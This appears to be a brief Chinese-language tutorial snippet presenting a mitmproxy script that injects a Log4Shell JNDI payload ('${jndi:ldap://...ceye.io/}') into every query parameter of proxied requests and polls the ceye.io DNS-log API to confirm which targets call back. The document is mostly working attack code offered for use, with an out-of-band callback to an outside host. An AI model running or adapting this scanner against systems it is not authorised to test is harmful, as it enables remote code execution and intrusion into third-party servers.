curl "http://api.ceye.io/v1/records?token=xxx&type=dns"
获取数据结合脚本。
from mitmproxy import http, ctx import requests import time def check_shuju(json_string): print(json_string) names = [item["name"] for item in json_string["data"]] unique_names = list(set(names)) print(unique_names) def send_get_request(url): try: response = requests.get(url) # 检查请求是否成功 response.raise_for_status() # 打印响应内容 return response.text except requests.exceptions.RequestException as err: print(f"发生错误: {err}") def request(flow: http.HTTPFlow) -> None: url = flow.request.url # 检查是否为 http://detectportal.firefox.com/success.txt if "http://detectportal.firefox.com/success.txt" in url: print("Skipping request to http://detectportal.firefox.com/success.txt") # 返回,不继续处理此请求 return # 获取原始参数 original_params = flow.request.query # 遍历每个参数 for param_name, param_value in original_params.items(): # 创建一个新的参数字典,用于更改参数 new_params = original_params.copy() # 更改当前参数的值 time_s = str(time.time()*1000) new_params[param_name] = "${jndi:ldap://"+time_s+"."+"xxx.ceye.io/}" # 更新请求的参数 flow.request.query = new_params # 打印更改后的参数 print("Updated Params:", flow.request.url) #写入文件记录 with open("result.txt", "a") as file: file.writelines(time_s+"idf6ss.ceye.io"+" "+flow.request.url+" "+str(flow.request.query)+"\n") # 继续发送请求 flow.resume() def response(flow: http.HTTPFlow) -> None: # 在这里添加处理响应的逻辑 a = send_get_request("http://api.ceye.io/v1/records?token=&type=dns") check_shuju(eval(a)) # 启动mitmproxy代理服务器 if __name__ == "__main__": from mitmproxy.tools.main import mitmdump mitmdump(['-p', '7777', '-s', __file__])
开始后测试每个参数 后查看ceye平台看看是否出现问题